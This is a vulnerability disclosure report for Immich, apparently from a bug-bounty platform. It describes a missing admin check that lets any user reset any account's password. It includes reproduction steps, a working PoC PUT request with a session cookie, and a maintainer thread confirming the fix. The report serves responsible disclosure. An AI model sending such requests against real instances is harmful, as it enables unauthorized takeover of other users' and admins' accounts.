Full Account Takeover via Improper Authorization in immich-app/immich

Valid

Reported on

Sep 15th 2022


Description

Immich does not check for admin privileges when setting account passwords. This allows any user to set the password for any account, thus allowing privilege escalation by admin account takeover.

Proof of Concept

Steps to reproduce:

1. Login to a non admin account
2. Obtain all user information with a GET request to `/api/user?isAll=false` (this is required for the `Shared Albums` feature). Admins can be found by the `isAdmin` flag
3. Set the password of any account with the following PoC request (adjust the user id accordingly). This is where the authorization check is missing
4. Observe that the target accounts password has been changed. This also works for admin accounts

PoC Request

PUT /api/user HTTP/1.1
Host: 10.0.2.15:2283
[...]
Cookie: immich_access_token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VySWQiOiJjNWRhYTE0MC1jYTEzLTQxOGYtYjFkMy0wNzZjNTRhZTgyYTAiLCJlbWFpbCI6Im5vdGFuYWRtaW5AdGVzdC5jb20iLCJpYXQiOjE2NjMyODEzMzcsImV4cCI6MTY2Mzg4NjEzN30.fbGB6YQ04F9JFs8qY4CtLeeah4L79vAh6QlZYJTWFDU; immich_is_authenticated=true


{"id":"ed0398b5-a64a-4dd5-af58-8a372bdee6e5","password":"password","shouldChangePassword":false}

Impact

The impact is full takeover of any existing account, including privilege escalation to admin accounts.

Occurrences

Proper authorization needs to be implemented to check whether the current user is an admin before setting another account's password.

We are processing your report and will contact the immich-app/immich team within 24 hours. 15 days ago
vautia modified the report
14 days ago
We have contacted a member of the immich-app/immich team and are waiting to hear back 13 days ago
immich-app/immich maintainer
13 days ago

Maintainer


Thank you for the report, I and the team really appreciate it.

This issue should be fixed in https://github.com/immich-app/immich/pull/716

vautia
12 days ago

Researcher


Glad to hear the issue is fixed @maintainer. In that case, could you please validate the report and confirm the fix?

immich-app/immich maintainer validated this vulnerability 10 days ago
vautia has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
immich-app/immich maintainer confirmed that a fix has been merged on ece94f 10 days ago
The fix bounty has been dropped
user.controller.ts#L74-L79 has been validated
to join this conversation